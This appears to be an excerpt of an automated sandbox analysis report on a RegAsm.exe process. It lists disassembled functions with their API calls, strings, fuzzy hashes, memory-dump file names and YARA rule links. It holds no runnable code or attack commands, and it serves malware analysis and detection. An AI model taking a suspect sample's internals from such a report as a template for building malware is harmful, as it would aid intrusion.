Opcode Fuzzy Hash: 3c843e85bdfefdf81fb12fb763cfbc4139646a860654429c943ecaf5c168ac73
Instruction Fuzzy Hash: 33314FB1A402159FDB10DF798C45BABBBF8EF49614F55882DE85AD7700EB34E844CBA0

Function 6C0E5EF0 Relevance: 7.6, APIs: 5, Instructions: 89COMMON

Download Yara Rule

APIs

?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6C0FDCA0,?,?,?,6C0BE8B5,00000000), ref: 6C0E5F1F
?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C0BE8B5,00000000), ref: 6C0E5F4B
?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6C0BE8B5,00000000), ref: 6C0E5F7B
?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6C0BE8B5,00000000), ref: 6C0E5F9F
?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C0BE8B5,00000000), ref: 6C0E5FD6

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
String ID:
API String ID: 1389714915-0
Opcode ID: 9718bd3909c0312ef5cdc4e53bda67bc1b60930f2ee87f0e3178b3280a7c84c5
Instruction ID: 86caa2d10e50cae889a3e9b5b815066216614ef01ac5be322d3e35a52b185eb7
Opcode Fuzzy Hash: 9718bd3909c0312ef5cdc4e53bda67bc1b60930f2ee87f0e3178b3280a7c84c5
Instruction Fuzzy Hash: ED31E9383406108FD714CF29C898B2AB7F5FF89359BA48958E5568BB95CB31EC41CB80

Function 6C08B4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 6C08B532
moz_xmalloc.MOZGLUE(?), ref: 6C08B55B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C08B56B
wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C08B57E
free.MOZGLUE(00000000), ref: 6C08B58F

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
String ID:
API String ID: 4244350000-0
Opcode ID: 8f7397fcc156252ef844bde7dab2f8b1b2cfecc2086dad3a562caeb5c43771d1
Instruction ID: 0ff456d4fe6443ff0f5893706386f12338b9b8671f1997c9081921853c48e035
Opcode Fuzzy Hash: 8f7397fcc156252ef844bde7dab2f8b1b2cfecc2086dad3a562caeb5c43771d1
Instruction Fuzzy Hash: 3E21B471A012059BDF00CFA8CC40BAABBF9FF46354F288169E918DB381E775D951C7A1

Function 6C08B7A0 Relevance: 7.6, APIs: 5, Instructions: 77COMMON

Download Yara Rule

APIs

?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C08B7CF
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C08B808
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C08B82C
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C08B840
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C08B849

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: free$?vprint@PrintfTarget@mozilla@@mallocmemcpy
String ID:
API String ID: 1977084945-0
Opcode ID: 548146c1c8fdc065d38d0ef9b750855ee4fd0193a3613c835016a10e42390db0
Instruction ID: ea305b5bafc4896756a924c8c7366965543057d37e4a9248a474bab7f5ac2d27
Opcode Fuzzy Hash: 548146c1c8fdc065d38d0ef9b750855ee4fd0193a3613c835016a10e42390db0
Instruction Fuzzy Hash: F0212AB4E002099FDF04DFA9C8856BEBBF4EF49314F148129EC55A7341E731A945CBA1

Function 6C0E6E50 Relevance: 7.6, APIs: 5, Instructions: 72COMMON

Download Yara Rule

APIs

MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C0E6E78

Part of subcall function 6C0E6A10: InitializeCriticalSection.KERNEL32(6C10F618), ref: 6C0E6A68
Part of subcall function 6C0E6A10: GetCurrentProcess.KERNEL32 ref: 6C0E6A7D
Part of subcall function 6C0E6A10: GetCurrentProcess.KERNEL32 ref: 6C0E6AA1
Part of subcall function 6C0E6A10: EnterCriticalSection.KERNEL32(6C10F618), ref: 6C0E6AAE
Part of subcall function 6C0E6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C0E6AE1
Part of subcall function 6C0E6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C0E6B15
Part of subcall function 6C0E6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C0E6B65
Part of subcall function 6C0E6A10: LeaveCriticalSection.KERNEL32(6C10F618,?,?), ref: 6C0E6B83

MozFormatCodeAddress.MOZGLUE ref: 6C0E6EC1
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C0E6EE1
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C0E6EED
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6C0E6EFF

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
String ID:
API String ID: 4058739482-0
Opcode ID: ccb8c5b2a123585d1d1bdd0e257528b0608cdaa067a334189e4f3018025c1d0f
Instruction ID: 8f863785c1dbaf72801c9e8c89fe1534dbda889c92f40b9eed08f85f59ced354
Opcode Fuzzy Hash: ccb8c5b2a123585d1d1bdd0e257528b0608cdaa067a334189e4f3018025c1d0f
Instruction Fuzzy Hash: 3A21A1B1A0421E9FDB10CF69E88569A7BF5EF88308F044479E94997341EB709A588F92

Function 00425713 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.MSVCRT ref: 00425721
_free.LIBCMT ref: 00425734

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _freemalloc
String ID:
API String ID: 3576935931-0
Opcode ID: feda3816294fd9af8db34316e038ce1953c349d56468ddbca55d0205ef3a299f
Instruction ID: b76dc663818b464284d97c71afdab2e33c7188303a79513cbdb4af8dfc28d3f2
Opcode Fuzzy Hash: feda3816294fd9af8db34316e038ce1953c349d56468ddbca55d0205ef3a299f
Instruction Fuzzy Hash: CB112732B40A31EBCF216F79BC0575A37A5AF803B5F60403FF8498A250DE7C8980969C

Function 6C0E76C0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 6C0E76F2
moz_xmalloc.MOZGLUE(00000001), ref: 6C0E7705

Part of subcall function 6C09CA10: malloc.MOZGLUE(?), ref: 6C09CA26

memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C0E7717
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6C0E778F,00000000,00000000,00000000,00000000), ref: 6C0E7731
free.MOZGLUE(00000000), ref: 6C0E7760

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
String ID:
API String ID: 2538299546-0
Opcode ID: 48800a9ebcd47570e550aa11e8cf87a3b53a29c38eba000da40e43ce8681ad85
Instruction ID: 0d361a7b27ba6c91b01c266bfcd25a42b691a5db02930ab6713d823999906456
Opcode Fuzzy Hash: 48800a9ebcd47570e550aa11e8cf87a3b53a29c38eba000da40e43ce8681ad85
Instruction Fuzzy Hash: BD11B2B1905215AFE710AFBA8C44BABBFE8EF49354F044429F888A7301F770994087E2

Function 6C0C0D60 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C083DEF), ref: 6C0C0D71
VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C083DEF), ref: 6C0C0D84
VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C083DEF), ref: 6C0C0DAF

Strings

<jemalloc>, xrefs: 6C0C0D92, 6C0C0DB9
: (malloc) Error in VirtualFree(), xrefs: 6C0C0D97, 6C0C0DBE

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 1852963964-2186867486
Opcode ID: 3843deed9fa8fd415e831bef79d204e448b077604e7e02f738f873b9e293310f
Instruction ID: e9f0e62572368a626edbb503b6e2b4ebe9e71c2114c00cc463c997490148a6dd
Opcode Fuzzy Hash: 3843deed9fa8fd415e831bef79d204e448b077604e7e02f738f873b9e293310f
Instruction Fuzzy Hash: CAF054B138969523EA2021665C0AB5E26DDA7C2B6DF348136F204EF9C0DF64E400D6A6

Function 6C0E5850 Relevance: 7.5, APIs: 5, Instructions: 41synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(000000FF), ref: 6C0E586C
CloseHandle.KERNEL32 ref: 6C0E5878
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C0E5898
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C0E58C9
free.MOZGLUE(00000000), ref: 6C0E58D3

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: free$CloseHandleObjectSingleWait
String ID:
API String ID: 1910681409-0
Opcode ID: 5ec94afade2d9f3cecdc2b10e721cbc24b64ca96cc26308c534099833ec82ae9
Instruction ID: 2862de1293c7a10b59bb39ccfe6222d0e1f370b00c9cd86af10d29d92cce5c89
Opcode Fuzzy Hash: 5ec94afade2d9f3cecdc2b10e721cbc24b64ca96cc26308c534099833ec82ae9
Instruction Fuzzy Hash: 46018B79700205DFCB00DF1A980AB067BF8EB87328724813EE02AD2250DF319818AF89

Function 6C0D7620 Relevance: 7.5, APIs: 5, Instructions: 35threadCOMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6C0D75C4,?), ref: 6C0D762B

Part of subcall function 6C09CA10: malloc.MOZGLUE(?), ref: 6C09CA26

InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6C0D74D7,6C0E15FC,?,?,?), ref: 6C0D7644
GetCurrentThreadId.KERNEL32 ref: 6C0D765A
AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C0D74D7,6C0E15FC,?,?,?), ref: 6C0D7663
ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C0D74D7,6C0E15FC,?,?,?), ref: 6C0D7677

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
String ID:
API String ID: 418114769-0
Opcode ID: 760f51e36b023eefb44467403be11880dbb3d872dc3c0b9118ba3b94defc076c
Instruction ID: 41b8956e60408ae3714f56d0ec00dbcdc88b361233222f83f90e5ee8a33f68d0
Opcode Fuzzy Hash: 760f51e36b023eefb44467403be11880dbb3d872dc3c0b9118ba3b94defc076c
Instruction Fuzzy Hash: B4F0AF71E14746ABD7008F21C888676B778FFEA259F21531AF90443601EBB0A5D09BD0

Function 00426719 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00426725

Part of subcall function 00424954: __getptd_noexit.LIBCMT ref: 00424957
Part of subcall function 00424954: __amsg_exit.LIBCMT ref: 00424964

__getptd.LIBCMT ref: 0042673C
__amsg_exit.LIBCMT ref: 0042674A
__lock.LIBCMT ref: 0042675A
__updatetlocinfoEx_nolock.LIBCMT ref: 0042676E

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: e5b528c2df55b90b8f95683bbe5c3f4538672bfb3054380b72a1938f3589f922
Instruction ID: 61088e3dfc20ce59d559a3ddfa1e0e88c0a27e6c6fc14d0a94ffceeb635e971d
Opcode Fuzzy Hash: e5b528c2df55b90b8f95683bbe5c3f4538672bfb3054380b72a1938f3589f922
Instruction Fuzzy Hash: A0F09672F047309BDB11FB79740675E76A0AF4076CFA2014FF454A62D2CB2C5940D65D

Function 6C0E1700 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 190COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 6C0E1800

Part of subcall function 6C0BCBE8: GetCurrentProcess.KERNEL32(?,6C0831A7), ref: 6C0BCBF1
Part of subcall function 6C0BCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0831A7), ref: 6C0BCBFA

Part of subcall function 6C084290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C0C3EBD,6C0C3EBD,00000000), ref: 6C0842A9

Strings

{marker.name} - {marker.data.name}, xrefs: 6C0E18C7
name, xrefs: 6C0E1939
Details, xrefs: 6C0E1925

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Process$CurrentInit_thread_footerTerminatestrlen
String ID: Details$name${marker.name} - {marker.data.name}
API String ID: 46770647-1733325692
Opcode ID: ea96f75fda228a55727ed3c284f7940b95dedc4d55efabf301578fa4c45b674c
Instruction ID: eb527116e5aa61dabf7c21235477551af5137360be65af912198cf18a25b9915
Opcode Fuzzy Hash: ea96f75fda228a55727ed3c284f7940b95dedc4d55efabf301578fa4c45b674c
Instruction Fuzzy Hash: 6971E0B0A002069FDB04CF68C454B9ABBF1FF49314F00466DD8654BB42DB70B6A8CBE1

Function 6C0EB0C0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 188COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,?,6C0EB0A6,6C0EB0A6,?,6C0EAF67,?,00000010,?,6C0EAF67,?,00000010,00000000,?,?,6C0EAB1F), ref: 6C0EB1F2
?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,6C0EB0A6,6C0EB0A6,?,6C0EAF67,?,00000010,?,6C0EAF67,?,00000010,00000000,?), ref: 6C0EB1FF
free.MOZGLUE(?,?,?,map/set<T> too long,?,?,6C0EB0A6,6C0EB0A6,?,6C0EAF67,?,00000010,?,6C0EAF67,?,00000010), ref: 6C0EB25F

Strings

map/set<T> too long, xrefs: 6C0EB1FA

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: free$Xlength_error@std@@
String ID: map/set<T> too long
API String ID: 1922495194-1285458680
Opcode ID: 68345d9ac505f11d99eaa497e116ee45fbf42272c5dd03591522576cd2e8ee1a
Instruction ID: f2c353c1aa27ff720b6797fac92160a6cbe1837a8fcd1e8832bbf2ef30e0d1d4
Opcode Fuzzy Hash: 68345d9ac505f11d99eaa497e116ee45fbf42272c5dd03591522576cd2e8ee1a
Instruction Fuzzy Hash: A46166746443458FD701CF19C880B9ABBE1BF4A728FA8C5A9D8599BB52C331FC45CBA1

Function 6C0AD468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 6C0BCBE8: GetCurrentProcess.KERNEL32(?,6C0831A7), ref: 6C0BCBF1
Part of subcall function 6C0BCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0831A7), ref: 6C0BCBFA

EnterCriticalSection.KERNEL32(6C10E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C0BD1C5), ref: 6C0AD4F2
LeaveCriticalSection.KERNEL32(6C10E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C0BD1C5), ref: 6C0AD50B

Part of subcall function 6C08CFE0: EnterCriticalSection.KERNEL32(6C10E784), ref: 6C08CFF6
Part of subcall function 6C08CFE0: LeaveCriticalSection.KERNEL32(6C10E784), ref: 6C08D026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C0BD1C5), ref: 6C0AD52E
EnterCriticalSection.KERNEL32(6C10E7DC), ref: 6C0AD690
LeaveCriticalSection.KERNEL32(6C10E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C0BD1C5), ref: 6C0AD751

Strings

MOZ_CRASH(), xrefs: 6C0AD4BB

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
String ID: MOZ_CRASH()
API String ID: 3805649505-2608361144
Opcode ID: e4d08d9e76aeab8de53f967af3764bd48c3c11099faab41a1f1b5ec7c3ad5c51
Instruction ID: 149774ae9244160e85ff8a019daaceb7c6352afa07e93b50f18eded8f47f4f4f
Opcode Fuzzy Hash: e4d08d9e76aeab8de53f967af3764bd48c3c11099faab41a1f1b5ec7c3ad5c51
Instruction Fuzzy Hash: 0251B371B047018FD318CFA9C09475AB7E5EF89704F54492ED9A9C7B46DB70E805CB91

Function 6C0D4630 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C0D4721

Strings

profiler-paused, xrefs: 6C0D46E4
-%llu, xrefs: 6C0D4733
., xrefs: 6C0D476A

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: -%llu$.$profiler-paused
API String ID: 3732870572-2661126502
Opcode ID: e02db4f64f552bc2653233fbe7d96b611d8a69597b5b5adfd82abe0da8db89be
Instruction ID: 61aba9be7d943a2b2ad4caa21b740383222d91bc48ffdbe6698030f94ddc9c84
Opcode Fuzzy Hash: e02db4f64f552bc2653233fbe7d96b611d8a69597b5b5adfd82abe0da8db89be
Instruction Fuzzy Hash: A2415A71F047046BCB08DFB8E85125EBBE5EF85744F11863DF85567741EB30A8458742

Function 6C0F9830 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C0F985D
?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C0F987D
MOZ_CrashPrintf.MOZGLUE(ElementAt(aIndex = %zu, aLength = %zu),?,?), ref: 6C0F98DE

Strings

ElementAt(aIndex = %zu, aLength = %zu), xrefs: 6C0F98D9

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Printf$Target@mozilla@@$?vprint@Crash
String ID: ElementAt(aIndex = %zu, aLength = %zu)
API String ID: 1778083764-3290996778
Opcode ID: 2f6b142887e742a0364ef5212b595782d8e43314f135bea4f4f7dd7734d80364
Instruction ID: 4c843b4d0ba85698f470eb98a7bef9dc633c0571351dd864a655432593c61783
Opcode Fuzzy Hash: 2f6b142887e742a0364ef5212b595782d8e43314f135bea4f4f7dd7734d80364
Instruction Fuzzy Hash: B631E871B001086FDB14EF59D845AEE77E9EF84718F50442DEA1AAB740DB31A905CBE1

Function 6C0D46E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 115COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C0D4721

